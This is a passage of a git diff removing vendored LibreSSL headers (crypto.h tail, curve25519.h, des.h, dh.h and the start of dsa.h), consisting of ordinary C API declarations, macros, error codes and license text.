-struct CRYPTO_dynlock_value *(*CRYPTO_get_dynlock_create_callback(void))(const char *file, int line);
-void (*CRYPTO_get_dynlock_lock_callback(void))(int mode, struct CRYPTO_dynlock_value *l, const char *file, int line);
-void (*CRYPTO_get_dynlock_destroy_callback(void))(struct CRYPTO_dynlock_value *l, const char *file, int line);
-
-/* CRYPTO_set_mem_functions includes CRYPTO_set_locked_mem_functions --
- * call the latter last if you need different functions */
-int CRYPTO_set_mem_functions(void *(*m)(size_t), void *(*r)(void *, size_t), void (*f)(void *));
-int CRYPTO_set_locked_mem_functions(void *(*m)(size_t), void (*free_func)(void *));
-int CRYPTO_set_mem_ex_functions(void *(*m)(size_t, const char *, int),
-    void *(*r)(void *, size_t, const char *, int), void (*f)(void *));
-int CRYPTO_set_locked_mem_ex_functions(void *(*m)(size_t, const char *, int),
-    void (*free_func)(void *));
-int CRYPTO_set_mem_debug_functions(
-    void (*m)(void *, int, const char *, int, int),
-    void (*r)(void *, void *, int, const char *, int, int),
-    void (*f)(void *, int), void (*so)(long), long (*go)(void));
-void CRYPTO_get_mem_functions(void *(**m)(size_t), void *(**r)(void *, size_t),
-    void (**f)(void *));
-void CRYPTO_get_locked_mem_functions(void *(**m)(size_t), void (**f)(void *));
-void CRYPTO_get_mem_ex_functions(void *(**m)(size_t, const char *, int),
-    void *(**r)(void *, size_t, const char *, int), void (**f)(void *));
-void CRYPTO_get_locked_mem_ex_functions(void *(**m)(size_t, const char *, int),
-    void (**f)(void *));
-void CRYPTO_get_mem_debug_functions(
-    void (**m)(void *, int, const char *, int, int),
-    void (**r)(void *, void *, int, const char *, int, int),
-    void (**f)(void *, int), void (**so)(long), long (**go)(void));
-
-#ifndef LIBRESSL_INTERNAL
-void *CRYPTO_malloc_locked(int num, const char *file, int line);
-void CRYPTO_free_locked(void *ptr);
-void *CRYPTO_malloc(int num, const char *file, int line);
-char *CRYPTO_strdup(const char *str, const char *file, int line);
-void CRYPTO_free(void *ptr);
-void *CRYPTO_realloc(void *addr, int num, const char *file, int line);
-#endif
-
-void *CRYPTO_realloc_clean(void *addr, int old_num, int num,
-    const char *file, int line);
-void *CRYPTO_remalloc(void *addr, int num, const char *file, int line);
-
-#ifndef LIBRESSL_INTERNAL
-void OPENSSL_cleanse(void *ptr, size_t len);
-#endif
-
-void CRYPTO_set_mem_debug_options(long bits);
-long CRYPTO_get_mem_debug_options(void);
-
-#define CRYPTO_push_info(info) \
-        CRYPTO_push_info_(info, __FILE__, __LINE__);
-int CRYPTO_push_info_(const char *info, const char *file, int line);
-int CRYPTO_pop_info(void);
-int CRYPTO_remove_all_info(void);
-
-
-/* Default debugging functions (enabled by CRYPTO_malloc_debug_init() macro;
- * used as default in CRYPTO_MDEBUG compilations): */
-/* The last argument has the following significance:
- *
- * 0:	called before the actual memory allocation has taken place
- * 1:	called after the actual memory allocation has taken place
- */
-void CRYPTO_dbg_malloc(void *addr, int num, const char *file, int line, int before_p)
-	__attribute__ ((deprecated));
-void CRYPTO_dbg_realloc(void *addr1, void *addr2, int num, const char *file, int line, int before_p)
-	__attribute__ ((deprecated));
-void CRYPTO_dbg_free(void *addr, int before_p)
-	__attribute__ ((deprecated));
-/* Tell the debugging code about options.  By default, the following values
- * apply:
- *
- * 0:                           Clear all options.
- * V_CRYPTO_MDEBUG_TIME (1):    Set the "Show Time" option.
- * V_CRYPTO_MDEBUG_THREAD (2):  Set the "Show Thread Number" option.
- * V_CRYPTO_MDEBUG_ALL (3):     1 + 2
- */
-void CRYPTO_dbg_set_options(long bits)
-	__attribute__ ((deprecated));
-long CRYPTO_dbg_get_options(void)
-	__attribute__ ((deprecated));
-
-
-void CRYPTO_mem_leaks_fp(FILE *);
-void CRYPTO_mem_leaks(struct bio_st *bio);
-/* unsigned long order, char *file, int line, int num_bytes, char *addr */
-typedef void *CRYPTO_MEM_LEAK_CB(unsigned long, const char *, int, int, void *);
-void CRYPTO_mem_leaks_cb(CRYPTO_MEM_LEAK_CB *cb);
-
-/* die if we have to */
-void OpenSSLDie(const char *file, int line, const char *assertion);
-#define OPENSSL_assert(e)       (void)((e) ? 0 : (OpenSSLDie(__FILE__, __LINE__, #e),1))
-
-uint64_t OPENSSL_cpu_caps(void);
-
-int OPENSSL_isservice(void);
-
-#ifndef LIBRESSL_INTERNAL
-void OPENSSL_init(void);
-
-/* CRYPTO_memcmp returns zero iff the |len| bytes at |a| and |b| are equal. It
- * takes an amount of time dependent on |len|, but independent of the contents
- * of |a| and |b|. Unlike memcmp, it cannot be used to put elements into a
- * defined order as the return value when a != b is undefined, other than to be
- * non-zero. */
-int CRYPTO_memcmp(const void *a, const void *b, size_t len);
-#endif
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_CRYPTO_strings(void);
-
-/* Error codes for the CRYPTO functions. */
-
-/* Function codes. */
-#define CRYPTO_F_CRYPTO_GET_EX_NEW_INDEX		 100
-#define CRYPTO_F_CRYPTO_GET_NEW_DYNLOCKID		 103
-#define CRYPTO_F_CRYPTO_GET_NEW_LOCKID			 101
-#define CRYPTO_F_CRYPTO_SET_EX_DATA			 102
-#define CRYPTO_F_DEF_ADD_INDEX				 104
-#define CRYPTO_F_DEF_GET_CLASS				 105
-#define CRYPTO_F_FIPS_MODE_SET				 109
-#define CRYPTO_F_INT_DUP_EX_DATA			 106
-#define CRYPTO_F_INT_FREE_EX_DATA			 107
-#define CRYPTO_F_INT_NEW_EX_DATA			 108
-
-/* Reason codes. */
-#define CRYPTO_R_FIPS_MODE_NOT_SUPPORTED		 101
-#define CRYPTO_R_NO_DYNLOCK_CREATE_CALLBACK		 100
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/curve25519.h b/thirdparty/libressl/include/openssl/curve25519.h
deleted file mode 100644
index 5aaa8c0..0000000
--- a/thirdparty/libressl/include/openssl/curve25519.h
+++ /dev/null
@@ -1,67 +0,0 @@
-/*
- * Copyright (c) 2015, Google Inc.
- *
- * Permission to use, copy, modify, and/or distribute this software for any
- * purpose with or without fee is hereby granted, provided that the above
- * copyright notice and this permission notice appear in all copies.
- *
- * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
- * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
- * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
- * SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
- * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION
- * OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
- * CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
- */
-
-#ifndef HEADER_CURVE25519_H
-#define HEADER_CURVE25519_H
-
-#include <stdint.h>
-
-#include <openssl/opensslconf.h>
-
-#if defined(__cplusplus)
-extern "C" {
-#endif
-
-/*
- * Curve25519.
- *
- * Curve25519 is an elliptic curve. See https://tools.ietf.org/html/rfc7748.
- */
-
-/*
- * X25519.
- *
- * X25519 is the Diffie-Hellman primitive built from curve25519. It is
- * sometimes referred to as curve25519, but X25519 is a more precise name.
- * See http://cr.yp.to/ecdh.html and https://tools.ietf.org/html/rfc7748.
- */
-
-#define X25519_KEY_LENGTH 32
-
-/*
- * X25519_keypair sets |out_public_value| and |out_private_key| to a freshly
- * generated, public/private key pair.
- */
-void X25519_keypair(uint8_t out_public_value[X25519_KEY_LENGTH],
-    uint8_t out_private_key[X25519_KEY_LENGTH]);
-
-/*
- * X25519 writes a shared key to |out_shared_key| that is calculated from the
- * given private key and the peer's public value. It returns one on success and
- * zero on error.
- *
- * Don't use the shared key directly, rather use a KDF and also include the two
- * public values as inputs.
- */
-int X25519(uint8_t out_shared_key[X25519_KEY_LENGTH],
-    const uint8_t private_key[X25519_KEY_LENGTH],
-    const uint8_t peers_public_value[X25519_KEY_LENGTH]);
-
-#if defined(__cplusplus)
-}  /* extern C */
-#endif
-
-#endif  /* HEADER_CURVE25519_H */
diff --git a/thirdparty/libressl/include/openssl/des.h b/thirdparty/libressl/include/openssl/des.h
deleted file mode 100644
index e1331d3..0000000
--- a/thirdparty/libressl/include/openssl/des.h
+++ /dev/null
@@ -1,219 +0,0 @@
-/* $OpenBSD: des.h,v 1.19 2015/02/07 13:19:15 doug Exp $ */
-/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_NEW_DES_H
-#define HEADER_NEW_DES_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef OPENSSL_NO_DES
-#error DES is disabled.
-#endif
-
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef unsigned char DES_cblock[8];
-typedef /* const */ unsigned char const_DES_cblock[8];
-/* With "const", gcc 2.8.1 on Solaris thinks that DES_cblock *
- * and const_DES_cblock * are incompatible pointer types. */
-
-typedef struct DES_ks
-    {
-    union
-	{
-	DES_cblock cblock;
-	/* make sure things are correct size on machines with
-	 * 8 byte longs */
-	DES_LONG deslong[2];
-	} ks[16];
-    } DES_key_schedule;
-
-#define DES_KEY_SZ 	(sizeof(DES_cblock))
-#define DES_SCHEDULE_SZ (sizeof(DES_key_schedule))
-
-#define DES_ENCRYPT	1
-#define DES_DECRYPT	0
-
-#define DES_CBC_MODE	0
-#define DES_PCBC_MODE	1
-
-#define DES_ecb2_encrypt(i,o,k1,k2,e) \
-	DES_ecb3_encrypt((i),(o),(k1),(k2),(k1),(e))
-
-#define DES_ede2_cbc_encrypt(i,o,l,k1,k2,iv,e) \
-	DES_ede3_cbc_encrypt((i),(o),(l),(k1),(k2),(k1),(iv),(e))
-
-#define DES_ede2_cfb64_encrypt(i,o,l,k1,k2,iv,n,e) \
-	DES_ede3_cfb64_encrypt((i),(o),(l),(k1),(k2),(k1),(iv),(n),(e))
-
-#define DES_ede2_ofb64_encrypt(i,o,l,k1,k2,iv,n) \
-	DES_ede3_ofb64_encrypt((i),(o),(l),(k1),(k2),(k1),(iv),(n))
-
-extern int DES_check_key;	/* defaults to false */
-extern int DES_rw_mode;		/* defaults to DES_PCBC_MODE */
-
-const char *DES_options(void);
-void DES_ecb3_encrypt(const_DES_cblock *input, DES_cblock *output,
-		      DES_key_schedule *ks1,DES_key_schedule *ks2,
-		      DES_key_schedule *ks3, int enc);
-DES_LONG DES_cbc_cksum(const unsigned char *input,DES_cblock *output,
-		       long length,DES_key_schedule *schedule,
-		       const_DES_cblock *ivec);
-/* DES_cbc_encrypt does not update the IV!  Use DES_ncbc_encrypt instead. */
-void DES_cbc_encrypt(const unsigned char *input,unsigned char *output,
-		     long length,DES_key_schedule *schedule,DES_cblock *ivec,
-		     int enc);
-void DES_ncbc_encrypt(const unsigned char *input,unsigned char *output,
-		      long length,DES_key_schedule *schedule,DES_cblock *ivec,
-		      int enc);
-void DES_xcbc_encrypt(const unsigned char *input,unsigned char *output,
-		      long length,DES_key_schedule *schedule,DES_cblock *ivec,
-		      const_DES_cblock *inw,const_DES_cblock *outw,int enc);
-void DES_cfb_encrypt(const unsigned char *in,unsigned char *out,int numbits,
-		     long length,DES_key_schedule *schedule,DES_cblock *ivec,
-		     int enc);
-void DES_ecb_encrypt(const_DES_cblock *input,DES_cblock *output,
-		     DES_key_schedule *ks,int enc);
-
-/* 	This is the DES encryption function that gets called by just about
-	every other DES routine in the library.  You should not use this
-	function except to implement 'modes' of DES.  I say this because the
-	functions that call this routine do the conversion from 'char *' to
-	long, and this needs to be done to make sure 'non-aligned' memory
-	access do not occur.  The characters are loaded 'little endian'.
-	Data is a pointer to 2 unsigned long's and ks is the
-	DES_key_schedule to use.  enc, is non zero specifies encryption,
-	zero if decryption. */
-void DES_encrypt1(DES_LONG *data,DES_key_schedule *ks, int enc);
-
-/* 	This functions is the same as DES_encrypt1() except that the DES
-	initial permutation (IP) and final permutation (FP) have been left
-	out.  As for DES_encrypt1(), you should not use this function.
-	It is used by the routines in the library that implement triple DES.
-	IP() DES_encrypt2() DES_encrypt2() DES_encrypt2() FP() is the same
-	as DES_encrypt1() DES_encrypt1() DES_encrypt1() except faster :-). */
-void DES_encrypt2(DES_LONG *data,DES_key_schedule *ks, int enc);
-
-void DES_encrypt3(DES_LONG *data, DES_key_schedule *ks1,
-		  DES_key_schedule *ks2, DES_key_schedule *ks3);
-void DES_decrypt3(DES_LONG *data, DES_key_schedule *ks1,
-		  DES_key_schedule *ks2, DES_key_schedule *ks3);
-void DES_ede3_cbc_encrypt(const unsigned char *input,unsigned char *output, 
-			  long length,
-			  DES_key_schedule *ks1,DES_key_schedule *ks2,
-			  DES_key_schedule *ks3,DES_cblock *ivec,int enc);
-void DES_ede3_cbcm_encrypt(const unsigned char *in,unsigned char *out,
-			   long length,
-			   DES_key_schedule *ks1,DES_key_schedule *ks2,
-			   DES_key_schedule *ks3,
-			   DES_cblock *ivec1,DES_cblock *ivec2,
-			   int enc);
-void DES_ede3_cfb64_encrypt(const unsigned char *in,unsigned char *out,
-			    long length,DES_key_schedule *ks1,
-			    DES_key_schedule *ks2,DES_key_schedule *ks3,
-			    DES_cblock *ivec,int *num,int enc);
-void DES_ede3_cfb_encrypt(const unsigned char *in,unsigned char *out,
-			  int numbits,long length,DES_key_schedule *ks1,
-			  DES_key_schedule *ks2,DES_key_schedule *ks3,
-			  DES_cblock *ivec,int enc);
-void DES_ede3_ofb64_encrypt(const unsigned char *in,unsigned char *out,
-			    long length,DES_key_schedule *ks1,
-			    DES_key_schedule *ks2,DES_key_schedule *ks3,
-			    DES_cblock *ivec,int *num);
-int DES_enc_read(int fd,void *buf,int len,DES_key_schedule *sched,
-		 DES_cblock *iv);
-int DES_enc_write(int fd,const void *buf,int len,DES_key_schedule *sched,
-		  DES_cblock *iv);
-char *DES_fcrypt(const char *buf,const char *salt, char *ret);
-char *DES_crypt(const char *buf,const char *salt);
-void DES_ofb_encrypt(const unsigned char *in,unsigned char *out,int numbits,
-		     long length,DES_key_schedule *schedule,DES_cblock *ivec);
-void DES_pcbc_encrypt(const unsigned char *input,unsigned char *output,
-		      long length,DES_key_schedule *schedule,DES_cblock *ivec,
-		      int enc);
-DES_LONG DES_quad_cksum(const unsigned char *input,DES_cblock output[],
-			long length,int out_count,DES_cblock *seed);
-int DES_random_key(DES_cblock *ret);
-void DES_set_odd_parity(DES_cblock *key);
-int DES_check_key_parity(const_DES_cblock *key);
-int DES_is_weak_key(const_DES_cblock *key);
-/* DES_set_key (= set_key = DES_key_sched = key_sched) calls
- * DES_set_key_checked if global variable DES_check_key is set,
- * DES_set_key_unchecked otherwise. */
-int DES_set_key(const_DES_cblock *key,DES_key_schedule *schedule);
-int DES_key_sched(const_DES_cblock *key,DES_key_schedule *schedule);
-int DES_set_key_checked(const_DES_cblock *key,DES_key_schedule *schedule);
-void DES_set_key_unchecked(const_DES_cblock *key,DES_key_schedule *schedule);
-void DES_string_to_key(const char *str,DES_cblock *key);
-void DES_string_to_2keys(const char *str,DES_cblock *key1,DES_cblock *key2);
-void DES_cfb64_encrypt(const unsigned char *in,unsigned char *out,long length,
-		       DES_key_schedule *schedule,DES_cblock *ivec,int *num,
-		       int enc);
-void DES_ofb64_encrypt(const unsigned char *in,unsigned char *out,long length,
-		       DES_key_schedule *schedule,DES_cblock *ivec,int *num);
-
-#define DES_fixup_key_parity DES_set_odd_parity
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/dh.h b/thirdparty/libressl/include/openssl/dh.h
deleted file mode 100644
index 920af3b..0000000
--- a/thirdparty/libressl/include/openssl/dh.h
+++ /dev/null
@@ -1,269 +0,0 @@
-/* $OpenBSD: dh.h,v 1.18 2016/11/04 18:35:30 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_DH_H
-#define HEADER_DH_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef OPENSSL_NO_DH
-#error DH is disabled.
-#endif
-
-#ifndef OPENSSL_NO_BIO
-#include <openssl/bio.h>
-#endif
-#include <openssl/ossl_typ.h>
-#ifndef OPENSSL_NO_DEPRECATED
-#include <openssl/bn.h>
-#endif
-	
-#ifndef OPENSSL_DH_MAX_MODULUS_BITS
-# define OPENSSL_DH_MAX_MODULUS_BITS	10000
-#endif
-
-#define DH_FLAG_CACHE_MONT_P     0x01
-
-/* If this flag is set the DH method is FIPS compliant and can be used
- * in FIPS mode. This is set in the validated module method. If an
- * application sets this flag in its own methods it is its reposibility
- * to ensure the result is compliant.
- */
-
-#define DH_FLAG_FIPS_METHOD			0x0400
-
-/* If this flag is set the operations normally disabled in FIPS mode are
- * permitted it is then the applications responsibility to ensure that the
- * usage is compliant.
- */
-
-#define DH_FLAG_NON_FIPS_ALLOW			0x0400
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* Already defined in ossl_typ.h */
-/* typedef struct dh_st DH; */
-/* typedef struct dh_method DH_METHOD; */
-
-struct dh_method
-	{
-	const char *name;
-	/* Methods here */
-	int (*generate_key)(DH *dh);
-	int (*compute_key)(unsigned char *key,const BIGNUM *pub_key,DH *dh);
-	int (*bn_mod_exp)(const DH *dh, BIGNUM *r, const BIGNUM *a,
-				const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx,
-				BN_MONT_CTX *m_ctx); /* Can be null */
-
-	int (*init)(DH *dh);
-	int (*finish)(DH *dh);
-	int flags;
-	char *app_data;
-	/* If this is non-NULL, it will be used to generate parameters */
-	int (*generate_params)(DH *dh, int prime_len, int generator, BN_GENCB *cb);
-	};
-
-struct dh_st
-	{
-	/* This first argument is used to pick up errors when
-	 * a DH is passed instead of a EVP_PKEY */
-	int pad;
-	int version;
-	BIGNUM *p;
-	BIGNUM *g;
-	long length; /* optional */
-	BIGNUM *pub_key;	/* g^x */
-	BIGNUM *priv_key;	/* x */
-
-	int flags;
-	BN_MONT_CTX *method_mont_p;
-	/* Place holders if we want to do X9.42 DH */
-	BIGNUM *q;
-	BIGNUM *j;
-	unsigned char *seed;
-	int seedlen;
-	BIGNUM *counter;
-
-	int references;
-	CRYPTO_EX_DATA ex_data;
-	const DH_METHOD *meth;
-	ENGINE *engine;
-	};
-
-#define DH_GENERATOR_2		2
-/* #define DH_GENERATOR_3	3 */
-#define DH_GENERATOR_5		5
-
-/* DH_check error codes */
-#define DH_CHECK_P_NOT_PRIME		0x01
-#define DH_CHECK_P_NOT_SAFE_PRIME	0x02
-#define DH_UNABLE_TO_CHECK_GENERATOR	0x04
-#define DH_NOT_SUITABLE_GENERATOR	0x08
-
-/* DH_check_pub_key error codes */
-#define DH_CHECK_PUBKEY_TOO_SMALL	0x01
-#define DH_CHECK_PUBKEY_TOO_LARGE	0x02
-
-/* primes p where (p-1)/2 is prime too are called "safe"; we define
-   this for backward compatibility: */
-#define DH_CHECK_P_NOT_STRONG_PRIME	DH_CHECK_P_NOT_SAFE_PRIME
-
-DH *d2i_DHparams_bio(BIO *bp, DH **a);
-int i2d_DHparams_bio(BIO *bp, DH *a);
-DH *d2i_DHparams_fp(FILE *fp, DH **a);
-int i2d_DHparams_fp(FILE *fp, DH *a);
-
-DH *DHparams_dup(DH *);
-
-const DH_METHOD *DH_OpenSSL(void);
-
-void DH_set_default_method(const DH_METHOD *meth);
-const DH_METHOD *DH_get_default_method(void);
-int DH_set_method(DH *dh, const DH_METHOD *meth);
-DH *DH_new_method(ENGINE *engine);
-
-DH *	DH_new(void);
-void	DH_free(DH *dh);
-int	DH_up_ref(DH *dh);
-int	DH_size(const DH *dh);
-int DH_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
-	     CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-int DH_set_ex_data(DH *d, int idx, void *arg);
-void *DH_get_ex_data(DH *d, int idx);
-
-/* Deprecated version */
-#ifndef OPENSSL_NO_DEPRECATED
-DH *	DH_generate_parameters(int prime_len,int generator,
-		void (*callback)(int,int,void *),void *cb_arg);
-#endif /* !defined(OPENSSL_NO_DEPRECATED) */
-
-/* New version */
-int	DH_generate_parameters_ex(DH *dh, int prime_len,int generator, BN_GENCB *cb);
-
-int	DH_check(const DH *dh,int *codes);
-int	DH_check_pub_key(const DH *dh,const BIGNUM *pub_key, int *codes);
-int	DH_generate_key(DH *dh);
-int	DH_compute_key(unsigned char *key,const BIGNUM *pub_key,DH *dh);
-DH *	d2i_DHparams(DH **a,const unsigned char **pp, long length);
-int	i2d_DHparams(const DH *a,unsigned char **pp);
-int	DHparams_print_fp(FILE *fp, const DH *x);
-#ifndef OPENSSL_NO_BIO
-int	DHparams_print(BIO *bp, const DH *x);
-#else
-int	DHparams_print(char *bp, const DH *x);
-#endif
-
-#define EVP_PKEY_CTX_set_dh_paramgen_prime_len(ctx, len) \
-	EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DH, EVP_PKEY_OP_PARAMGEN, \
-			EVP_PKEY_CTRL_DH_PARAMGEN_PRIME_LEN, len, NULL)
-
-#define EVP_PKEY_CTX_set_dh_paramgen_generator(ctx, gen) \
-	EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DH, EVP_PKEY_OP_PARAMGEN, \
-			EVP_PKEY_CTRL_DH_PARAMGEN_GENERATOR, gen, NULL)
-
-#define	EVP_PKEY_CTRL_DH_PARAMGEN_PRIME_LEN	(EVP_PKEY_ALG_CTRL + 1)
-#define	EVP_PKEY_CTRL_DH_PARAMGEN_GENERATOR	(EVP_PKEY_ALG_CTRL + 2)
-		
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_DH_strings(void);
-
-/* Error codes for the DH functions. */
-
-/* Function codes. */
-#define DH_F_COMPUTE_KEY				 102
-#define DH_F_DHPARAMS_PRINT_FP				 101
-#define DH_F_DH_BUILTIN_GENPARAMS			 106
-#define DH_F_DH_COMPUTE_KEY				 114
-#define DH_F_DH_GENERATE_KEY				 115
-#define DH_F_DH_GENERATE_PARAMETERS_EX			 116
-#define DH_F_DH_NEW_METHOD				 105
-#define DH_F_DH_PARAM_DECODE				 107
-#define DH_F_DH_PRIV_DECODE				 110
-#define DH_F_DH_PRIV_ENCODE				 111
-#define DH_F_DH_PUB_DECODE				 108
-#define DH_F_DH_PUB_ENCODE				 109
-#define DH_F_DO_DH_PRINT				 100
-#define DH_F_GENERATE_KEY				 103
-#define DH_F_GENERATE_PARAMETERS			 104
-#define DH_F_PKEY_DH_DERIVE				 112
-#define DH_F_PKEY_DH_KEYGEN				 113
-
-/* Reason codes. */
-#define DH_R_BAD_GENERATOR				 101
-#define DH_R_BN_DECODE_ERROR				 109
-#define DH_R_BN_ERROR					 106
-#define DH_R_DECODE_ERROR				 104
-#define DH_R_INVALID_PUBKEY				 102
-#define DH_R_KEYS_NOT_SET				 108
-#define DH_R_KEY_SIZE_TOO_SMALL				 110
-#define DH_R_MODULUS_TOO_LARGE				 103
-#define DH_R_NON_FIPS_METHOD				 111
-#define DH_R_NO_PARAMETERS_SET				 107
-#define DH_R_NO_PRIVATE_VALUE				 100
-#define DH_R_PARAMETER_ENCODING_ERROR			 105
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/dsa.h b/thirdparty/libressl/include/openssl/dsa.h
deleted file mode 100644
index 6ddd4c3..0000000
--- a/thirdparty/libressl/include/openssl/dsa.h
+++ /dev/null
@@ -1,320 +0,0 @@
-/* $OpenBSD: dsa.h,v 1.22 2016/11/04 18:35:30 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
